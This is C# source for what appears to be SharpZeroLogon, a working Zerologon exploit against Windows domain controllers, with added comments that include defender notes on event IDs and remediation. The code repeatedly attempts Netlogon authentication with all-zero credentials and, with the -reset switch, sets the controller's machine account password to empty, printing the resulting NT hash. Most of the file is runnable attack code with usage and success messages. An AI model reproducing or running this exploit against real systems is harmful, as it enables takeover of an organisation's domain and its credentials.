/// <summary>
/// P/Invoke declaration for the Netlogon machine-account password-set RPC used by
/// <c>Main</c>. The <c>DllImport</c> attribute that binds it to its native library is
/// not visible in this view and must precede this line elsewhere in the file.
/// </summary>
/// <param name="PrimaryName">Name of the target server (Main passes the DC FQDN).</param>
/// <param name="AccountName">Machine account being changed (Main passes hostname + "$").</param>
/// <param name="AccountType">Secure-channel type (Main passes ServerSecureChannel).</param>
/// <param name="ComputerName">Client computer name presented to the server (Main passes the first DNS label).</param>
/// <param name="Authenticator">Caller-supplied authenticator; Main passes a freshly default-constructed struct.</param>
/// <param name="ReturnAuthenticator">Authenticator returned by the server; Main discards it with <c>out _</c>.</param>
/// <param name="ClearNewPassword">New trust password; Main passes a freshly default-constructed struct.</param>
/// <returns>Native status code; the caller in this file treats 0 as success.</returns>
/// <remarks>
/// Defender note: a successful call rewrites the target's machine account password. On the
/// domain controller this surfaces as a computer-account-changed security event (4742) that
/// does not line up with the account's normal rotation schedule; that, together with the burst
/// of Netlogon challenge/authenticate traffic that precedes it in <c>Main</c>, is the primary
/// host-side indicator for this tool's "-reset" path. Recovery requires restoring the affected
/// machine account password, not just applying the Netlogon hardening update.
/// </remarks>
public static extern int I_NetServerPasswordSet2(
    string PrimaryName,
    string AccountName,
    NETLOGON_SECURE_CHANNEL_TYPE AccountType,
    string ComputerName,
    ref NETLOGON_AUTHENTICATOR Authenticator,
    out NETLOGON_AUTHENTICATOR ReturnAuthenticator,
    ref NL_TRUST_PASSWORD ClearNewPassword );
/// <summary>
/// Alternative password-set path that drives the Netlogon RPC through a raw stub
/// (<c>GetStubPtr()</c> / <c>GetProcStringPtr(142)</c>) instead of the managed
/// <c>I_NetServerPasswordSet2</c> import. Nothing in this view calls it — <c>Main</c>
/// uses the import directly — so it appears to be an unused or experimental variant.
/// </summary>
/// <param name="targetcomputeraccount">Machine account name marshalled as the account being changed.</param>
/// <returns>
/// The status returned by <c>NetServerPasswordSet2</c>, cast to <c>NTSTATUS</c>; presumably
/// <c>Natives.NTSTATUS</c> and <c>NTSTATUS</c> name the same enum via a using directive — confirm.
/// </returns>
/// <remarks>
/// Every piece of credential material here is zero: both 8-byte credential arrays, both
/// authenticator timestamps, and the default-constructed <c>NL_TRUST_PASSWORD</c>. The client
/// computer name is the fixed literal "Neverland". None of the <c>AllocHGlobal</c> /
/// <c>StringToHGlobalUni</c> allocations is ever freed (there is no <c>FreeHGlobal</c> call), and
/// the returned status is not inspected by this method. <c>GetStubPtr</c>, <c>GetProcStringPtr</c>
/// and <c>NetServerPasswordSet2</c> are defined outside this view; the meaning of index 142
/// cannot be confirmed from here.
/// Defender note: a server that enforces secure Netlogon channels rejects an authenticator built
/// from all-zero credentials; acceptance of this call is the condition the tool's "Success" path
/// in <c>Main</c> tests for, and the resulting password change is what event 4742 records.
/// </remarks>
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
{
    // Eight zero bytes for each credential; the "plaintext" and "ciphertext" arrays are identical.
    byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
    byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
    NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL { data = plaintext };
    NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL { data = ciphertext };
    // Both authenticators carry a zero timestamp alongside the zero credential.
    NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR { Credential = palintextcred, Timestamp = 0 };
    NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR { Credential = chiphertextcred, Timestamp = 0 };
    // Copy the managed structs into unmanaged memory for the raw stub call.
    // fDeleteOld = false because the destination was just allocated and holds no prior contents.
    IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));
    Marshal.StructureToPtr(plainAuth, pcred, false);
    IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));
    Marshal.StructureToPtr(cipherAuth, ccred, false);
    // Wide-string (UTF-16) copies of the client name and the target account name.
    IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");
    IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);
    // Default-constructed trust password, marshalled the same way.
    NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD();
    IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass));
    Marshal.StructureToPtr(tpass, ptpass, false);
    // Raw RPC call; the third argument (binding/handle slot) is IntPtr.Zero.
    // The HGlobal buffers above are intentionally or accidentally leaked — nothing frees them.
    NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass);
    return((NTSTATUS)rpcStatus);
}
/// <summary>
/// Entry point. Parses <c>&lt;target dc fqdn&gt;</c> plus optional <c>-reset</c> / <c>-patch</c>
/// switches, then repeatedly runs the Netlogon challenge / authenticate pair against the target
/// until one authenticate call returns 0 or 2000 iterations have elapsed. With <c>-reset</c>, a
/// successful authentication is followed by a single <c>I_NetServerPasswordSet2</c> call that
/// rewrites the target's machine account password.
/// </summary>
/// <param name="args">
/// <c>args[0]</c> is the DC FQDN; the first DNS label of it is used as the machine name and, with
/// "$" appended, as the machine account name. Any later argument equal to "-reset" or "-patch"
/// sets the corresponding flag; other arguments are ignored.
/// </param>
/// <remarks>
/// Defender note: every loop iteration issues two RPC calls to the DC, so a single client can
/// produce up to 4000 Netlogon calls in a tight burst; that volume alone is an indicator worth
/// alerting on. A DC that enforces secure Netlogon channels rejects these attempts (the tool
/// then prints "Attack failed. Target is probably patched."), and Microsoft's Netlogon hardening
/// guidance documents system events (5827 and neighbours) for denied vulnerable connections —
/// verify the exact IDs against current documentation. A successful <c>-reset</c> leaves the
/// machine account with the empty-password NT hash printed below; remediation is to restore that
/// account's password, since the hardening update alone does not undo the change.
/// </remarks>
static void Main(string[] args)
{
    if (args.Length < 1)
    {
        Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
        return;
    }
    bool reset = false;
    bool patch = false;
    string fqdn = args[0];
    // First DNS label of the FQDN doubles as the NetBIOS-style machine name.
    string hostname = fqdn.Split('.')[0];
    // args[0] is also scanned here; it simply will not match either switch.
    foreach (string arg in args)
    {
        switch (arg)
        {
            case "-reset": reset = true; break;
            case "-patch": patch = true; break;
        }
    }
    if (patch)
    {
        // PatchLogon() is defined outside this view; from its success message it appears to
        // change the local Netlogon client transport, but that cannot be verified from here.
        if (!PatchLogon())
        {
            Console.WriteLine("Patching failed :(");
            return;
        }
        Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
    }
    // Both challenge structs are default-constructed once and reused across every iteration;
    // ClientChallenge is never re-initialised inside the loop.
    NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
    NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
    // Negotiate flags requested from the server; passed by ref and not reset between attempts,
    // so any value the call writes back carries into the next iteration. Bit meanings are not
    // established in this view.
    ulong NegotiateFlags = 0x212fffff;
    Console.WriteLine("Performing authentication attempts...");
    for (int i = 0; i < 2000; i++)
    {
        // Any non-zero status from the challenge step aborts the whole run.
        if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
        {
            Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
            return;
        }
        // Progress marker: one "=" per attempt.
        Console.Write("=");
        if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
        {
            Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");
            // Default-constructed authenticator and trust password; the server's returned
            // authenticator is discarded (out _).
            NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR();
            NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD();
            if (reset)
            {
                if (I_NetServerPasswordSet2( fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref authenticator, out _, ref ClearNewPassword ) == 0)
                {
                    // The printed value is the NT hash of an empty password; this is the state
                    // an incident responder must reverse by rotating the machine account.
                    Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
                    return;
                }
                Console.WriteLine("Failed to reset machine account password");
            }
            // Without -reset the run ends after the first successful authentication.
            return;
        }
    }
    // Reached only when all 2000 authenticate attempts returned non-zero.
    Console.WriteLine("\nAttack failed. Target is probably patched.");
}